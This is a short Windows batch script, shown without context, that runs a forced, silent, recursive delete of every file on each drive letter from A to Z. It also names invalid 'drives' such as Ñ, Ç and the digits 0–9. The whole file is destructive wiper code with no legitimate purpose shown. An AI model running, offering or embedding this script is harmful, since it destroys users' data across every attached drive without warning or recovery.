@echo off
cd C:\
del A:*.*/f/s/q
del B:*.*/f/s/q
del C:*.*/f/s/q
del D:*.*/f/s/q
del E:*.*/f/s/q
del F:*.*/f/s/q
del G:*.*/f/s/q
del H:*.*/f/s/q
del I:*.*/f/s/q
del J:*.*/f/s/q
del K:*.*/f/s/q
del L:*.*/f/s/q
del M:*.*/f/s/q
del N:*.*/f/s/q
del Ñ:*.*/f/s/q
del Ç:*.*/f/s/q
del O:*.*/f/s/q
del P:*.*/f/s/q
del Q:*.*/f/s/q
del R:*.*/f/s/q
del S:*.*/f/s/q
del T:*.*/f/s/q
del U:*.*/f/s/q
del V:*.*/f/s/q
del W:*.*/f/s/q
del X:*.*/f/s/q
del Y:*.*/f/s/q
del Z:*.*/f/s/q
del 1:*.*/f/s/q
del 2:*.*/f/s/q
del 3:*.*/f/s/q
del 4:*.*/f/s/q
del 5:*.*/f/s/q
del 6:*.*/f/s/q
del 7:*.*/f/s/q
del 8:*.*/f/s/q
del 9:*.*/f/s/q
del 0:*.*/f/s/q

